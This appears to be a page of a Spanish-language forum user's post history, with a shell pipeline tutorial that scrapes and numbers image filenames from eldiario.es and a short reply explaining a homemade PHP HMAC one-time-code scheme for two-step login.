="https://www.eldiario.es/fotos/Solange-Knowles_EDIIMA20190304_0368_22.jpg
="https://www.eldiario.es/fotos/Bake-Off_EDIIMA20190307_0057_19.jpg
="https://www.eldiario.es/fotos/Venda_EDIIMA20190307_0060_19.jpg
="https://www.eldiario.es/fotos/Vazquez_EDIIMA20190306_0111_19.jpg


Pero solo queremos el nombre de la imagen con su extension!!!, pues vamos a usar el awk diciendole que lo que separa las palabras es el caracter "/" y nos quedamos con la última palabra:

Código: text

curl https://www.eldiario.es/ | grep "<img" | sed s/".*src"/""/ | grep jpg | sed s/"jpg.*"/"jpg"/ | awk -F "/" '{print $NF}'


con lo que tenemos esto:

Código: text

eco-frente-crisis_EDIIMA20190306_0979_19.jpg
Evacuada-Universidad-Glasgow-detectarse-sospechoso_EDIIMA20190306_0771_21.jpg
escuela-trato-censurada-Policia-brasilena_EDIIMA20190305_0639_23.jpg
India-Pakistan-cines-pantalla_EDIIMA20160930_0643_21.jpg
Mensaje-cuenta-Bolsonaro-Twitter-preguntando_EDIIMA20190306_0597_21.jpg
Ray-Loriga-Sabado-entrevista-eldiarioes_EDIIMA20190227_0423_22.jpg
Caricatura-anonima-Emilio-Pardo-Bazan_EDIIMA20190304_0476_10.jpg
Maria-Sanchez-autora-Tierra-mujeres_EDIIMA20190303_0332_10.jpg
Courtney-Love-Straight-to-Hell_EDIIMA20190301_0883_22.jpg
18010_20160831Ph8xAs.jpg
Herstoricas-Time-Out_EDIIMA20190304_0372_17.jpg
Maria-Hervas-Time-Out_EDIIMA20190304_0369_17.jpg
Libros-feministas-Time-Out_EDIIMA20190304_0370_17.jpg
corbeau_EDIIMA20190214_0838_23.jpg
mujer-conoce-capitan-Hoggie_EDIIMA20190301_0761_21.jpg
Solange-Knowles_EDIIMA20190304_0368_22.jpg
Bake-Off_EDIIMA20190307_0057_19.jpg
Venda_EDIIMA20190307_0060_19.jpg
Vazquez_EDIIMA20190306_0111_19.jpg


Y imaginate que ademas queremos numerar el numero de imagenes, pues podemos usar el nl:

Código: text

curl https://www.eldiario.es/ | grep "<img" | sed s/".*src"/""/ | grep jpg | sed s/"jpg.*"/"jpg"/ | awk -F "/" '{print $NF}' | nl


Y tenemos esto:

Código: text

.....
    81	Caricatura-anonima-Emilio-Pardo-Bazan_EDIIMA20190304_0476_10.jpg
    82	Maria-Sanchez-autora-Tierra-mujeres_EDIIMA20190303_0332_10.jpg
    83	Courtney-Love-Straight-to-Hell_EDIIMA20190301_0883_22.jpg
    84	18010_20160831Ph8xAs.jpg
    85	Herstoricas-Time-Out_EDIIMA20190304_0372_17.jpg
    86	Maria-Hervas-Time-Out_EDIIMA20190304_0369_17.jpg
    87	Libros-feministas-Time-Out_EDIIMA20190304_0370_17.jpg
    88	corbeau_EDIIMA20190214_0838_23.jpg
    89	mujer-conoce-capitan-Hoggie_EDIIMA20190301_0761_21.jpg
    90	Solange-Knowles_EDIIMA20190304_0368_22.jpg
    91	Bake-Off_EDIIMA20190307_0057_19.jpg
    92	Venda_EDIIMA20190307_0060_19.jpg
    93	Vazquez_EDIIMA20190306_0111_19.jpg


Y ahora por ejemplo queremo que la salida en lugar de ser así sea algo asi como la imagen X es esta nombrefichero, pues de nuevo awk:

Código: text

curl https://www.eldiario.es/ | grep "<img" | sed s/".*src"/""/ | grep jpg | sed s/"jpg.*"/"jpg"/ | awk -F "/" '{print $NF}' | nl | awk '{print "La imagen " $1 " es esta " $2 }'


Con lo que la salida sería esta:

Código: text

...
La imagen 74 es esta Dimas-Gimeno-nombres-posibilidades-Alvarez_EDIIMA20140914_0349_20.jpg
La imagen 75 es esta eco-frente-crisis_EDIIMA20190306_0979_19.jpg
La imagen 76 es esta Evacuada-Universidad-Glasgow-detectarse-sospechoso_EDIIMA20190306_0771_21.jpg
La imagen 77 es esta escuela-trato-censurada-Policia-brasilena_EDIIMA20190305_0639_23.jpg
La imagen 78 es esta India-Pakistan-cines-pantalla_EDIIMA20160930_0643_21.jpg
La imagen 79 es esta Mensaje-cuenta-Bolsonaro-Twitter-preguntando_EDIIMA20190306_0597_21.jpg
La imagen 80 es esta Ray-Loriga-Sabado-entrevista-eldiarioes_EDIIMA20190227_0423_22.jpg
La imagen 81 es esta Caricatura-anonima-Emilio-Pardo-Bazan_EDIIMA20190304_0476_10.jpg
La imagen 82 es esta Maria-Sanchez-autora-Tierra-mujeres_EDIIMA20190303_0332_10.jpg
La imagen 83 es esta Courtney-Love-Straight-to-Hell_EDIIMA20190301_0883_22.jpg
La imagen 84 es esta 18010_20160831Ph8xAs.jpg
La imagen 85 es esta Herstoricas-Time-Out_EDIIMA20190304_0372_17.jpg
La imagen 86 es esta Maria-Hervas-Time-Out_EDIIMA20190304_0369_17.jpg
La imagen 87 es esta Libros-feministas-Time-Out_EDIIMA20190304_0370_17.jpg
La imagen 88 es esta corbeau_EDIIMA20190214_0838_23.jpg
La imagen 89 es esta mujer-conoce-capitan-Hoggie_EDIIMA20190301_0761_21.jpg
La imagen 90 es esta Solange-Knowles_EDIIMA20190304_0368_22.jpg
La imagen 91 es esta Bake-Off_EDIIMA20190307_0057_19.jpg
La imagen 92 es esta Venda_EDIIMA20190307_0060_19.jpg
La imagen 93 es esta Vazquez_EDIIMA20190306_0111_19.jpg
#220
Dudas y pedidos generales / Re:Validacion de usuarios
Marzo 06, 2019, 06:41:54 AM
Para verificación en dos pasos simplemente tienes que hacer una aplicación móvil y una php en la que se calcula el hmac del timestamp en UTC dividida entre un tiempo X (por ejemplo 30 segundos) y una clave aleatoria que se ha guardado en limpio en el servidor y se ha dado al cliente móvil. el resultado se reduce al numero de dígitos que se desee, por ejemplo 6 y se pide a la hora de haber metido el password correctamente. El código en PHP es bastante sencillo:

Código: text

substr(hash_hmac('sha256',floor(time()/30) , $pass),0,$size)."\n";


Donde en $pass se almacena la password compartida y en $size se determina el tamaño de la clave OTP que desea introducir el usuario.
Páginas 1 ... 9 10 11 12 13 ... 19